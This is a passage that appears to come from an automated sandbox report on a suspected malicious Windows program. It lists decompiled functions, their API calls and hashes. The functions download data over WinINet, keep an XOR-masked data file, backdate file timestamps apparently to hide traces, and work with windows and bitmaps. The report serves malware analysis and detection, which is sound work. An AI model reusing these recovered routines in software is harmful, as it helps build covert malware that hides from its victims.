    				signed int _t77;
    				void* _t92;
    				char* _t94;
    				signed int _t96;
    				signed int _t97;
    				void* _t98;
    				void* _t100;
    
    				_t100 =  &_v32;
    				_t94 = __eax;
    				_v32 = 0;
    				if(E004173A0( &_v16,  *((intOrPtr*)(__eax + 0x10))) == 0) {
    					return 0;
    				} else {
    					_t96 =  *(_t94 + 0x24);
    					if(_v2 != 2) {
    						_t97 = _t96 & 0xfffffffb;
    					} else {
    						_t97 = _t96 | 0x00000004;
    					}
    					_t51 = 0;
    					_v20 = _t97;
    					_v29 = 0;
    					if( *((intOrPtr*)(_t94 + 1)) > 0) {
    						do {
    							if(_t51 == 0) {
    								L10:
    								_t77 =  *(_t94 + 0x14);
    								_v30 = 1;
    								if( *_t94 != 0) {
    									_t77 = _t77 | 0x00000001;
    									_v30 = 2;
    								}
    								_v31 = 0;
    								if(_v30 > 0) {
    									do {
    										if(_v31 == 1) {
    											_t77 = _t77 & 0xfffffffe;
    										}
    										_t92 = E00412FC0(_t77,  *((intOrPtr*)(_t94 + 0xc)), _v16, _v4);
    										if(_t92 == 0) {
    											goto L27;
    										} else {
    											_t98 = E004130B0(_t97, _t92, _v12,  *((intOrPtr*)(_t94 + 0x1c)),  *((intOrPtr*)(_t94 + 0x20)));
    											if(_t98 != 0) {
    												_t70 =  *((intOrPtr*)(_t94 + 0x2c));
    												_push( *(_t94 + 8));
    												if(_t70 == 0) {
    													_t72 = E00413180(_t98,  *((intOrPtr*)(_t100 + 0x38)),  *((intOrPtr*)(_t94 + 0x28)));
    												} else {
    													_push( *((intOrPtr*)(_t94 + 0x28)));
    													_push(_t70);
    													_push(_t98);
    													_t72 = E004132A0();
    												}
    												_v36 = _t72;
    												InternetCloseHandle(_t98);
    											}
    											 *(_t100 + 0x24) = 0;
    											 *((intOrPtr*)(_t100 + 0x28)) = 4;
    											_t66 = InternetQueryOptionA(_t92, 0x15, _t100 + 0x18, _t100 + 0x18);
    											InternetCloseHandle(_t92);
    											if(_t66 != 0) {
    												_t68 = _v48;
    												if(_t68 != 0 && _v44 == 4) {
    													InternetCloseHandle(_t68);
    												}
    											}
    											if(_v52 == 0) {
    												_t97 =  *(_t100 + 0x1c);
    												goto L27;
    											}
    										}
    										goto L29;
    										L27:
    										_t62 = _v31 + 1;
    										_v31 = _t62;
    									} while (_t62 < _v30);
    								}
    								goto L28;
    							} else {
    								_t74 =  *(_t94 + 8);
    								if(_t74 == 0) {
    									Sleep( *(_t94 + 4));
    									goto L10;
    								} else {
    									if(WaitForSingleObject(_t74,  *(_t94 + 4)) == 0x102) {
    										goto L10;
    									}
    								}
    							}
    							goto L29;
    							L28:
    							_t51 = _v29 + 1;
    							_v29 = _t51;
    						} while (_t51 <  *((intOrPtr*)(_t94 + 1)));
    					}
    					L29:
    					_t52 = _v16;
    					if(_t52 != 0) {
    						HeapFree( *0x42e6d4, 0, _t52);
    					}
    					_t53 = _v12;
    					if(_t53 != 0) {
    						HeapFree( *0x42e6d4, 0, _t53);
    					}
    					return _v32;
    				}
    			}



































    APIs
      • Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
    • WaitForSingleObject.KERNEL32(?,?), ref: 00413408
    • Sleep.KERNEL32(?), ref: 0041341F
      • Part of subcall function 00413180: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?,?,00000000), ref: 004131BB
      • Part of subcall function 00413180: HeapFree.KERNEL32(?,00001000,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 004131EA
      • Part of subcall function 00413180: InternetReadFile.WININET(?,?,00001000,00001000), ref: 00413232
      • Part of subcall function 00413180: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001,?), ref: 0041325A
    • InternetCloseHandle.WININET(00000000), ref: 004134B9
    • InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 004134DC
    • InternetCloseHandle.WININET(00000000), ref: 004134EB
    • InternetCloseHandle.WININET(?), ref: 00413501
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041354D
    • HeapFree.KERNEL32(?,00000000,?), ref: 00413561
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$FreeHeap$CloseHandle$ObjectSingleWait$CrackFileOptionQueryReadSleep
    • String ID:
    • API String ID: 3595247247-0
    • Opcode ID: 1d978f567b27c13991d58637c3d4bb2e2338899e20ce9ca14f3995359dccaf46
    • Instruction ID: b1d53459dc8ff9143f2361245a2de75d1bd653708507c77510e4428d2edc6376
    • Opcode Fuzzy Hash: 1d978f567b27c13991d58637c3d4bb2e2338899e20ce9ca14f3995359dccaf46
    • Instruction Fuzzy Hash: 1F51F775108385AFD321DF29D840BABBBE9AF85704F04495EF8D583341C678EE89C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00419110(WCHAR* __eax) {
    				void* _t21;
    				signed int _t26;
    				signed int _t27;
    				signed int _t29;
    				void* _t30;
    				signed int _t35;
    				union _LARGE_INTEGER _t37;
    				int _t38;
    				int _t40;
    				long _t41;
    				struct _OVERLAPPED* _t42;
    				signed int _t44;
    				struct _OVERLAPPED* _t59;
    				void** _t61;
    				void* _t62;
    
    				_t61 =  *(_t62 + 0x24);
    				_t41 = 0;
    				_t21 = CreateFileW(__eax, 0xc0000000, 1, 0, 4, 0x80, 0);
    				 *_t61 = _t21;
    				if(_t21 == 0xffffffff) {
    					L5:
    					return _t41;
    				} else {
    					__imp__GetFileSizeEx(_t21, _t62 + 0x18);
    					if(_t21 == 0) {
    						L18:
    						CloseHandle( *_t61);
    						 *_t61 = 0xffffffff;
    						__eflags = 0;
    						return 0;
    					} else {
    						_t26 =  *(_t62 + 0x18);
    						_t44 =  *(_t62 + 0x1c);
    						if((_t26 & _t44) == 0xffffffff) {
    							goto L18;
    						} else {
    							_t27 = _t26 | _t44;
    							if(_t27 != 0) {
    								_t42 = 0;
    								 *((intOrPtr*)(_t62 + 0x38)) = 0;
    								_t29 = ReadFile( *_t61, _t62 + 0x1c, 5, _t62 + 0x30, 0);
    								__eflags = _t29;
    								if(_t29 == 0) {
    									goto L18;
    								} else {
    									while(1) {
    										_t27 =  *(_t62 + 0x2c);
    										__eflags = _t27;
    										if(_t27 == 0) {
    											goto L4;
    										}
    										__eflags = _t27 - 5;
    										if(_t27 != 5) {
    											L16:
    											_t35 = E00418100(0,  *_t61, _t42,  *(_t62 + 0x24));
    											__eflags = _t35;
    											if(_t35 == 0) {
    												goto L18;
    											} else {
    												_t27 = SetEndOfFile( *_t61);
    												__eflags = _t27;
    												if(_t27 != 0) {
    													goto L4;
    												} else {
    													goto L18;
    												}
    											}
    										} else {
    											_t37 =  *(_t62 + 0x10) ^ _t61[4];
    											asm("adc esi, [esp+0x24]");
    											_t59 = _t37 + _t42 + 5;
    											asm("adc esi, ecx");
    											 *(_t62 + 0x10) = _t37;
    											__eflags = 0 -  *(_t62 + 0x1c);
    											if(__eflags > 0) {
    												goto L16;
    											} else {
    												if(__eflags < 0) {
    													L12:
    													__eflags = _t37 - 0xa00000;
    													if(_t37 > 0xa00000) {
    														goto L16;
    													} else {
    														_push(1);
    														_t38 = SetFilePointerEx( *_t61, _t37, 0, 0);
    														__eflags = _t38;
    														if(_t38 == 0) {
    															goto L18;
    														} else {
    															_t42 = _t59;
    															 *((intOrPtr*)(_t62 + 0x38)) = 0;
    															_t40 = ReadFile( *_t61, _t62 + 0x1c, 5, _t62 + 0x30, 0);
    															__eflags = _t40;
    															if(_t40 != 0) {
    																continue;
    															} else {
    																goto L18;
    															}
    														}
    													}
    												} else {
    													__eflags = _t59 -  *(_t62 + 0x18);
    													if(_t59 >  *(_t62 + 0x18)) {
    														goto L16;
    													} else {
    														goto L12;
    													}
    												}
    											}
    										}
    										goto L19;
    									}
    									goto L4;
    								}
    							} else {
    								L4:
    								_push(0);
    								_t30 = _t27 | 0xffffffff;
    								_t61[2] = _t30;
    								_t61[3] = _t30;
    								_t41 = 1;
    								SetFilePointerEx( *_t61, 0, 0, 0);
    								goto L5;
    							}
    						}
    					}
    				}
    				L19:
    			}

    APIs
    • CreateFileW.KERNEL32(0042D4F8,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,?,?,00000000), ref: 00419130
    • GetFileSizeEx.KERNEL32(00000000,?,?,00000000), ref: 00419144
    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00419182
      • Part of subcall function 00418100: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00419240,?,00000000,?,?,00000000), ref: 00418112
    • ReadFile.KERNEL32(?,?,00000005,?,00000000,?,00000000), ref: 004191AB
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000001,?,00000000), ref: 00419201
    • ReadFile.KERNEL32(?,?,00000005,?,00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 00419223
    • SetEndOfFile.KERNEL32(?,?,00000000,?,?,00000000), ref: 00419248
    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0041925A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Pointer$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 771431435-0
    • Opcode ID: 5f34af80b206632f83d1969567a9be69861cbfa5a77245deac7b3c1bcf4e2840
    • Instruction ID: bff7257d08670166ebb49018c5ee5219ceb500d4db21294e6dc30971168dd52b
    • Opcode Fuzzy Hash: 5f34af80b206632f83d1969567a9be69861cbfa5a77245deac7b3c1bcf4e2840
    • Instruction Fuzzy Hash: 5841CD712002017FEB14DF64DC88FEB73E8EB88710F048A2EF915D7290E674ED858A69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00418380(intOrPtr* __eax, signed int __ecx, void* __eflags) {
    				short _v524;
    				struct _SYSTEMTIME _v540;
    				long _v544;
    				struct _FILETIME _v552;
    				char _v553;
    				SYSTEMTIME* _v564;
    				intOrPtr _v568;
    				void* __edi;
    				void* _t32;
    				void* _t36;
    				void* _t38;
    				signed int _t40;
    				signed int _t44;
    				long _t47;
    				signed int _t55;
    				SYSTEMTIME* _t67;
    				intOrPtr* _t78;
    				void* _t80;
    				signed int _t82;
    				void* _t84;
    
    				_t84 = (_t82 & 0xfffffff8) - 0x22c;
    				_t78 = __eax;
    				_t55 = __ecx;
    				_v544 = 1;
    				GetSystemTime( &_v540);
    				_t67 =  &_v540;
    				SystemTimeToFileTime(_t67,  &_v552);
    				asm("adc ecx, 0xfe624e21");
    				_t32 = E00415780(_v552.dwLowDateTime + 0x2ac18000, _v552.dwHighDateTime, 0x989680, 0);
    				if(_t32 <= 0xa8c0 || _t32 < _t55) {
    					L15:
    					return 0;
    				} else {
    					_t34 = _t32 - 0xa8c0;
    					if(_t32 - 0xa8c0 < _t55) {
    						goto L15;
    					} else {
    						_t36 = E00412520(_t34 - _t55, 0);
    						_t37 = _t36 + _t55;
    						if(_t36 + _t55 < _t55) {
    							goto L15;
    						} else {
    							_v553 = 1;
    							_t38 = E004157F0(_t37, 0, 0x989680, 0);
    							asm("adc edx, 0x19db1de");
    							_v568 = _t38 + 0xd53e8000;
    							_t40 = 0;
    							_v564 = _t67;
    							if(_t78 != 0 &&  *_t78 != 0) {
    								do {
    									_t40 = _t40 + 1;
    								} while ( *((intOrPtr*)(_t78 + _t40 * 2)) != 0);
    							}
    							 *((short*)(_t84 + E00410820( &_v524, _t78, _t40 + _t40) + 0x30)) = 0;
    							do {
    								_t44 = PathIsDirectoryW( &_v524);
    								asm("sbb ecx, ecx");
    								_t80 = CreateFileW( &_v524, 0x100, 1, 0, 3,  ~((_t44 & 0xffffff00 | _t44 == 0x00000001) & 0x000000ff) & 0x02000000, 0);
    								if(_t80 == 0xffffffff) {
    									L11:
    									_v553 = 0;
    								} else {
    									_t55 = _t55 & 0xffffff00 | SetFileTime(_t80,  &_v552,  &_v552,  &_v552) != 0x00000000;
    									CloseHandle(_t80);
    									if(_t55 == 0) {
    										goto L11;
    									}
    								}
    								_t47 = _v544;
    								_v544 = _t47 - 1;
    							} while (_t47 != 0 && PathRemoveFileSpecW( &_v524) != 0);
    							return _v553;
    						}
    					}
    				}
    			}

    APIs
    • GetSystemTime.KERNEL32 ref: 004183A0
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004183B0
    • __aulldiv.LIBCMT ref: 004183D2
      • Part of subcall function 00412520: GetTickCount.KERNEL32 ref: 00412527
    • PathIsDirectoryW.SHLWAPI(?), ref: 00418467
    • CreateFileW.KERNEL32(?,00000100,00000001,00000000,00000003,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680), ref: 0041848F
    • SetFileTime.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184A8
    • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184B4
    • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,?,00000000,00000000,00000000,00989680,00000000,?,?,00989680,00000000), ref: 004184D7
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FileTime$PathSystem$CloseCountCreateDirectoryHandleRemoveSpecTick__aulldiv
    • String ID:
    • API String ID: 2367051557-0
    • Opcode ID: 8a69880eabc879851b090626e77c2c7df16eca70f1aaaa0e4ffa5682ab226b85
    • Instruction ID: a074aefb1d03e0e6691e326cc0d747b57c5e38cd8ed3c7733e408ffae559736a
    • Opcode Fuzzy Hash: 8a69880eabc879851b090626e77c2c7df16eca70f1aaaa0e4ffa5682ab226b85
    • Instruction Fuzzy Hash: 7641E8726043015BD724EF24ED85FEB77D8EBC4704F04092EF985D2291EA78C988876A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E004192B0(void** __esi, void* _a4, long _a8) {
    				union _LARGE_INTEGER* _v8;
    				union _LARGE_INTEGER* _v12;
    				signed int _v16;
    				void* _v20;
    				char _v28;
    				long _v32;
    				char _v33;
    				void _v40;
    				long _v44;
    				signed int _t30;
    				union _LARGE_INTEGER _t46;
    				void** _t67;
    				signed int _t68;
    
    				_t67 = __esi;
    				_t68 = _a8;
    				_v33 = 0;
    				if(_t68 > 0xa00000) {
    					L12:
    					return 0;
    				} else {
    					_push(1);
    					if(SetFilePointerEx( *__esi, 0, 0,  &_v20) == 0 || (_v20 & _v16) == 0xffffffff) {
    						goto L12;
    					} else {
    						_push(2);
    						if(SetFilePointerEx( *__esi, 0, 0, 0) == 0) {
    							goto L12;
    						} else {
    							_t30 = E00418120( *__esi);
    							_t46 = _t30;
    							_t31 = _t30 & 0;
    							_v12 = 0;
    							if((_t30 & 0) != 0xffffffff) {
    								E00410870(_t31,  &_v28, 0, 5);
    								_v40 = __esi[4] ^ _t68;
    								if(WriteFile( *__esi,  &_v40, 5,  &_v44, 0) == 0 || _v32 != 5 || WriteFile( *__esi, _a4, _a8,  &_v32, 0) == 0 || _v32 != _a8) {
    									_push(0);
    									SetFilePointerEx( *_t67, _t46, _v8, 0);
    									SetEndOfFile( *_t67);
    								} else {
    									_v33 = 1;
    								}
    							}
    							FlushFileBuffers( *_t67);
    							_push(0);
    							SetFilePointerEx( *_t67, _v20, _v16, 0);
    							return _v33;
    						}
    					}
    				}
    			}

    APIs
    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,00000000), ref: 004192E2
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000002,?,00000000), ref: 00419309
      • Part of subcall function 00418120: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000001,00000001,?,00000000), ref: 00418135
    • WriteFile.KERNEL32(?,00000005,00000005,?,00000000,?,00000000,00000005,?,?,00000000), ref: 00419356
    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000004,0000001E), ref: 00419377
    • SetFilePointerEx.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 0041939B
    • SetEndOfFile.KERNEL32(?,?,?,00000000), ref: 004193A0
    • FlushFileBuffers.KERNEL32(?,?,?,00000000), ref: 004193A9
    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000), ref: 004193C0
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Pointer$Write$BuffersFlush
    • String ID:
    • API String ID: 3148524875-0
    • Opcode ID: 37cbf46c965dd956aaa99562a929b21a191d502cc0d376ece76d3f82ff35b8a7
    • Instruction ID: e7e272161cf7bd27f1d9048c3342699c1de5d2638b6834a6b91a96a8a34a3ca1
    • Opcode Fuzzy Hash: 37cbf46c965dd956aaa99562a929b21a191d502cc0d376ece76d3f82ff35b8a7
    • Instruction Fuzzy Hash: 5A315D71244304ABD324EB66CC95FABB3E9AFCC704F104A1EF99097290D674ED858B66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407750(WCHAR* __ecx, intOrPtr __edx, void* __eflags) {
    				char _v336;
    				short _v848;
    				short _v856;
    				char _v864;
    				intOrPtr _v868;
    				void* _v876;
    				long _v880;
    				void* __edi;
    				void* __esi;
    				signed int _t14;
    				long _t31;
    				WCHAR* _t35;
    				void* _t38;
    				WCHAR* _t42;
    				void* _t43;
    				long _t44;
    				WCHAR* _t45;
    				void* _t46;
    
    				_t42 = __ecx;
    				_t45 =  &_v864;
    				_v868 = __edx;
    				E00424100(0x2b, _t45);
    				_t35 = _t45;
    				L1:
    				_t14 =  *_t35 & 0x0000ffff;
    				if(_t14 == 0x5c || _t14 == 0x2f) {
    					_t35 =  &(_t35[1]);
    					goto L1;
    				}
    				if(PathCombineW( &_v848, _t42, _t35) == 0) {
    					L16:
    					return 1;
    				}
    				_t46 = CreateFileW( &_v856, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t46 == 0xffffffff) {
    					goto L16;
    				}
    				_t43 =  &_v336;
    				_t31 = 0;
    				E004240C0(0x30, _t43);
    				if(WriteFile(_t46, _t43, 0x146,  &_v880, 0) != 0 && _v880 == 0x146) {
    					_t38 = _v876;
    					if(_t38 != 0) {
    						_t44 = E00411B00(_t38);
    						if(WriteFile(_t46, _t38, _t44,  &_v880, 0) == 0 || _v880 != _t44) {
    							_t31 = 0;
    						} else {
    							_t31 = 1;
    						}
    					} else {
    						_t31 = 1;
    					}
    				}
    				FlushFileBuffers(_t46);
    				CloseHandle(_t46);
    				if(_t31 == 0) {
    					SetFileAttributesW( &_v856, 0x80);
    					DeleteFileW( &_v856);
    				}
    				goto L16;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,00000000,?,74B39600,00000000), ref: 00407789
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004077AE
    • WriteFile.KERNEL32(00000000,?,00000146,?,00000000,74B396D0,00000000), ref: 004077EA
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00407817
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040782A
    • CloseHandle.KERNEL32(00000000), ref: 00407831
    • SetFileAttributesW.KERNEL32(?,00000080), ref: 00407847
    • DeleteFileW.KERNEL32(?), ref: 00407852
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Write$AttributesBuffersCloseCombineCreateDeleteFlushHandlePath
    • String ID:
    • API String ID: 1225955004-0
    • Opcode ID: 55ea57f635f186b6b971968d681ea03af36315812416ee0c10f2a38a81e28251
    • Instruction ID: c073a44c259d012f32c037504955845da49d2e1c997e63a904124d7e52d29c32
    • Opcode Fuzzy Hash: 55ea57f635f186b6b971968d681ea03af36315812416ee0c10f2a38a81e28251
    • Instruction Fuzzy Hash: 9C21E532A48301ABD620AB21AC49FAB3398AF95741F04493EF641F61D0DB78E905C76B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00427350(void* __eax, struct tagRECT __ecx, void* __edx) {
    				intOrPtr _t46;
    				int _t49;
    				void* _t50;
    				void* _t57;
    				intOrPtr _t58;
    				void* _t71;
    				void* _t72;
    				struct tagRECT _t73;
    				struct HWND__* _t74;
    				void* _t75;
    				signed int _t76;
    				void* _t77;
    
    				_t57 = __edx;
    				_t71 = __eax;
    				_t73 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t57 + 0x10));
    				_t76 =  *(_t46 + 0x110) & 0x0000ffff;
    				 *(_t77 + 0x18) =  *(_t46 + 0x108);
    				ReleaseMutex( *(_t57 + 0x14));
    				_t49 = GetWindowRect( *(_t77 + 0x14), _t77 + 0x18);
    				if(_t49 != 0) {
    					if(_t76 != 2) {
    						_t50 = _t76 - 2;
    						if(_t50 <= 0xf) {
    							switch( *((intOrPtr*)(( *(_t50 + 0x42749c) & 0x000000ff) * 4 +  &M00427478))) {
    								case 0:
    									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
    									 *((intOrPtr*)(__esp + 0x18)) = __esi;
    									goto L13;
    								case 1:
    									 *((intOrPtr*)(__esp + 0x24)) = __edi;
    									goto L12;
    								case 2:
    									 *(_t77 + 0x18) = _t73;
    									goto L13;
    								case 3:
    									L12:
    									 *((intOrPtr*)(__esp + 0x20)) = __esi;
    									goto L13;
    								case 4:
    									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
    									goto L13;
    								case 5:
    									 *((intOrPtr*)(__esp + 0x1c)) = __edi;
    									goto L12;
    								case 6:
    									 *((intOrPtr*)(__esp + 0x24)) = __edi;
    									goto L13;
    								case 7:
    									 *((intOrPtr*)(__esp + 0x24)) = __edi;
    									 *((intOrPtr*)(__esp + 0x18)) = __esi;
    									goto L13;
    								case 8:
    									goto L13;
    							}
    						}
    					} else {
    						_t58 =  *((intOrPtr*)(_t57 + 0x10));
    						_t75 = _t73 -  *((intOrPtr*)(_t58 + 0x100));
    						_t72 = _t71 -  *((intOrPtr*)(_t58 + 0x104));
    						 *(_t77 + 0x18) =  *(_t77 + 0x18) + _t75;
    						 *(_t77 + 0x1c) =  *(_t77 + 0x1c) + _t72;
    						 *((intOrPtr*)(_t77 + 0x20)) =  *((intOrPtr*)(_t77 + 0x20)) + _t75;
    						 *((intOrPtr*)(_t77 + 0x24)) =  *((intOrPtr*)(_t77 + 0x24)) + _t72;
    					}
    					L13:
    					_t49 = IsRectEmpty(_t77 + 0x18);
    					if(_t49 == 0) {
    						_t74 =  *(_t77 + 0x14);
    						if((GetWindowLongW(_t74, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_t74), _t77 + 0x1c, 2);
    						}
    						return SetWindowPos(_t74, 0,  *(_t77 + 0x18),  *(_t77 + 0x1c),  *((intOrPtr*)(_t77 + 0x28)) -  *(_t77 + 0x18),  *((intOrPtr*)(_t77 + 0x24)) -  *(_t77 + 0x1c), 0x630c);
    					}
    				}
    				return _t49;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
    • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
    • GetWindowRect.USER32 ref: 00427391
    • IsRectEmpty.USER32(?), ref: 00427414
    • GetWindowLongW.USER32(?,000000F0), ref: 00427425
    • GetParent.USER32(?), ref: 0042743A
    • MapWindowPoints.USER32 ref: 00427443
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 7944ae83d066c2bc057a3eda2642eecb89c617086fe84867f196add9bc47fee6
    • Instruction ID: 7006958334d8f0ba4e2515da4589f04ca59f37595e58eb73062f7676e8df4305
    • Opcode Fuzzy Hash: 7944ae83d066c2bc057a3eda2642eecb89c617086fe84867f196add9bc47fee6
    • Instruction Fuzzy Hash: 8631BF706083219FD304EF15E98496BBBE8FF88750F10066EF98496262D774D906CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00406080(intOrPtr* __eax, char _a4) {
    				unsigned int _v8;
    				unsigned int _v16;
    				void* _t63;
    				int _t64;
    				void* _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t73;
    				void* _t77;
    				void* _t81;
    				signed int _t83;
    				unsigned int _t84;
    				unsigned int _t85;
    				intOrPtr* _t87;
    				unsigned int _t88;
    				struct HDC__* _t89;
    				signed short _t90;
    				signed char _t93;
    				unsigned int _t97;
    				char _t98;
    				char _t99;
    				char _t105;
    				struct HDC__* _t107;
    				void* _t108;
    				void* _t109;
    				char _t110;
    
    				_t110 = _a4;
    				_t87 = __eax;
    				_t107 = _t89;
    				_t63 = HeapAlloc( *0x42e6d4, 8, 0x58);
    				_t109 = _t63;
    				if(_t109 != 0) {
    					 *_t109 = _t107;
    					_t90 =  *_t87;
    					 *(_t109 + 8) = _t90;
    					_t64 =  *(_t87 + 4) & 0x0000ffff;
    					_a4 = 0;
    					 *(_t109 + 0xa) = _t64;
    					if(_t110 == 0) {
    						L29:
    						HeapFree( *0x42e6d4, 0, _t109);
    						_t109 = 0;
    					} else {
    						if(CreateCompatibleBitmap(_t107, _t90 & 0x0000ffff, _t64) == 0) {
    							_t69 = 0;
    						} else {
    							_push(0x128);
    							_push(_t110);
    							_t6 = _t109 + 0x14; // 0x14
    							_push( &_v16);
    							_t69 = E00419A20(_t68, _t107);
    						}
    						 *(_t109 + 0x10) = _t69;
    						if(_t69 == 0) {
    							goto L29;
    						} else {
    							_t108 = _v16;
    							_t93 =  *(_t108 + 0xe) >> 3;
    							_t71 = ( *(_t109 + 8) & 0x0000ffff) * (_t93 & 0x000000ff);
    							 *(_t109 + 0x30) = _t93;
    							 *(_t109 + 0xc) = _t71;
    							if((_t71 & 0x00000003) != 0) {
    								_t71 = (_t71 & 0xfffffffc) + 4;
    							}
    							 *(_t109 + 0xc) = _t71;
    							_t72 =  *(_t108 + 0xe);
    							_t18 = _t109 + 0x20; // 0x20
    							_t111 = _t18;
    							 *_t18 = _t72;
    							 *((char*)(_t109 + 0x21)) =  *(_t108 + 0xe);
    							 *((char*)(_t109 + 0x22)) = 0;
    							_t73 = _t72 & 0xffffff00 |  *(_t108 + 0xe) != 0x00000008;
    							 *(_t109 + 0x23) = _t73;
    							if(_t73 == 1) {
    								_t83 =  *(_t108 + 0xe) & 0x0000ffff;
    								if(_t83 != 0x10) {
    									if(_t83 != 0x20) {
    										_t97 = _v8;
    										_t84 = _v8;
    									} else {
    										_t97 = 0xff0000;
    										_t84 = 0xff00;
    										_v16 = 0xff;
    									}
    								} else {
    									_t97 = 0x7c00;
    									_t84 = 0x3e0;
    									_v16 = 0x1f;
    								}
    								_t105 = 0;
    								while((_t97 & 0x00000001) == 0) {
    									_t97 = _t97 >> 1;
    									_t105 = _t105 + 1;
    								}
    								 *(_t109 + 0x24) = _t97;
    								_t98 = 0;
    								 *((char*)(_t109 + 0x2a)) = _t105;
    								while((_t84 & 0x00000001) == 0) {
    									_t84 = _t84 >> 1;
    									_t98 = _t98 + 1;
    								}
    								 *(_t109 + 0x26) = _t84;
    								_t85 = _v16;
    								 *((char*)(_t109 + 0x2b)) = _t98;
    								_t99 = 0;
    								while((_t85 & 0x00000001) == 0) {
    									_t85 = _t85 >> 1;
    									_t99 = _t99 + 1;
    								}
    								 *(_t109 + 0x28) = _t85;
    								 *((char*)(_t109 + 0x2c)) = _t99;
    							}
    							_t50 = _t109 + 0x31; // 0x31
    							E00410820(_t50, _t111, 0x10);
    							 *((char*)(_t109 + 0x41)) =  *(_t109 + 0x30);
    							_t77 = ( *(_t109 + 0xa) & 0x0000ffff) *  *(_t109 + 0xc);
